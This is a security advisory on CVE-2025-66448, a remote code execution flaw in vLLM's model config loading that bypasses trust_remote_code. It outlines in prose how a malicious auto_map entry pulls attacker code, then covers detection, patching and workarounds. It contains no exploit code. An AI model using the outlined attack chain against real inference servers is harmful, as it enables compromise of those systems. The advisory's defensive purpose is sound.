CVE-2025-66448 Overview
CVE-2025-66448 is a critical remote code execution vulnerability in vLLM, a popular inference and serving engine for large language models (LLMs). The vulnerability exists in the Nemotron_Nano_VL_Config class and allows attackers to execute arbitrary code on systems loading malicious model configurations, even when the trust_remote_code=False security flag is explicitly set.
When vLLM loads a model configuration containing an auto_map entry, the config class resolves that mapping using get_class_from_dynamic_module(...) and immediately instantiates the returned class. This mechanism fetches and executes Python code from remote repositories referenced in the auto_map string, bypassing the intended security controls. An attacker can exploit this by publishing a seemingly benign model repository whose config.json points via auto_map to a separate malicious backend repository, causing the victim's system to silently execute the attacker's code.
Critical Impact
Remote attackers can achieve full code execution on systems running vLLM prior to version 0.11.1 by crafting malicious model configurations that bypass the trust_remote_code=False security setting. With a CVSS score of 8.8 (HIGH), this vulnerability poses significant risk to AI/ML infrastructure.
Affected Products
- vLLM versions prior to 0.11.1
- Systems loading untrusted model configurations via vLLM
- AI/ML pipelines utilizing vLLM for inference and model serving
Discovery Timeline
- 2025-12-01 - CVE-2025-66448 published to NVD
- 2025-12-03 - Last updated in NVD database
Technical Details for CVE-2025-66448
Vulnerability Analysis
This vulnerability is classified as CWE-94 (Improper Control of Generation of Code - Code Injection). The attack vector is network-based with low attack complexity, requiring no privileges but some user interaction, as indicated by the CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
The vulnerability fundamentally represents a trust boundary violation in vLLM's model loading mechanism. The trust_remote_code parameter was designed as a security control to prevent execution of arbitrary code from remote model repositories. However, the implementation in Nemotron_Nano_VL_Config fails to respect this setting when processing auto_map configuration entries.
The EPSS (Exploit Prediction Scoring System) indicates a 0.153% probability of exploitation in the wild, placing this vulnerability at the 36.567th percentile as of 2025-12-16.
Root Cause
The root cause lies in the vllm.transformers_utils.config.get_config function's handling of auto_map entries. When a model configuration contains an auto_map field, the code path through get_class_from_dynamic_module(...) is triggered regardless of the trust_remote_code setting. This function dynamically imports and instantiates Python classes from URLs specified in the configuration, creating a direct code execution path that circumvents the intended security boundary.
The critical flaw is the immediate instantiation of classes retrieved from remote sources without validating the trust_remote_code flag, effectively rendering this security control ineffective for this specific code path.
Attack Vector
The attack vector exploits the model loading pipeline in vLLM. An attacker can execute this attack through the following mechanism:
- The attacker creates a seemingly legitimate model repository with a benign appearance
- The repository's config.json contains an auto_map entry pointing to a malicious backend repository
- When a victim loads this model using vLLM (even with trust_remote_code=False), the engine processes the auto_map configuration
- The get_class_from_dynamic_module(...) function fetches Python code from the attacker-controlled repository
- The malicious code is immediately executed on the victim's system with the privileges of the vLLM process
This attack is particularly dangerous in AI/ML environments where loading pre-trained models from public repositories is common practice. The assumption that trust_remote_code=False provides protection creates a false sense of security.
Detection Methods for CVE-2025-66448
Indicators of Compromise
- Unexpected network connections to unknown repositories during model loading operations
- Unusual process spawning or file system modifications during vLLM model initialization
- Presence of unexpected Python modules or classes being dynamically loaded from remote sources
- Anomalous outbound traffic from vLLM inference servers to external code repositories
Detection Strategies
Organizations should implement monitoring for vLLM model loading operations, particularly focusing on:
- Network Monitoring: Track all outbound connections made during model initialization to identify connections to unexpected repositories
- Process Monitoring: Monitor for child process creation during vLLM operations that may indicate code execution
- Configuration Auditing: Implement validation of model config.json files before loading, specifically checking for suspicious auto_map entries
- Version Detection: Audit all deployed vLLM instances to identify versions prior to 0.11.1
Monitoring Recommendations
Deploy application-level monitoring on systems running vLLM to detect anomalous behavior during model loading operations. Implement network segmentation to limit the ability of vLLM instances to reach arbitrary external repositories. Consider using allowlisting for model sources and implementing pre-validation of model configurations before loading. SentinelOne's behavioral AI engine can detect anomalous code execution patterns that may indicate exploitation of this vulnerability.
How to Mitigate CVE-2025-66448
Immediate Actions Required
- Upgrade all vLLM installations to version 0.11.1 or later immediately
- Audit all model repositories currently in use for suspicious auto_map configurations
- Implement network controls to restrict vLLM instances from accessing untrusted external repositories
- Review logs for any indicators of previous exploitation attempts
Patch Information
The vulnerability has been fixed in vLLM version 0.11.1. The patch commit ffb08379d8870a1a81ba82b72797f196838d0c86 addresses the issue by properly enforcing the trust_remote_code setting for all code paths including auto_map resolution.
Patch resources:
- Commit: https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86
- Security Advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm
- Pull Request: https://github.com/vllm-project/vllm/pull/28126
Workarounds
If immediate patching is not possible, organizations should implement the following temporary mitigations:
- Network Isolation: Restrict vLLM instances to only access trusted, internal model repositories
- Model Configuration Validation: Implement pre-loading validation to reject model configurations containing auto_map entries pointing to untrusted sources
- Sandboxing: Run vLLM instances in isolated containers with limited network access and restricted privileges
- Source Verification: Only load models from verified, trusted sources and implement checksum validation for model files
# Upgrade vLLM to patched version
pip install --upgrade vllm>=0.11.1
# Verify installed version
pip show vllm | grep Version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


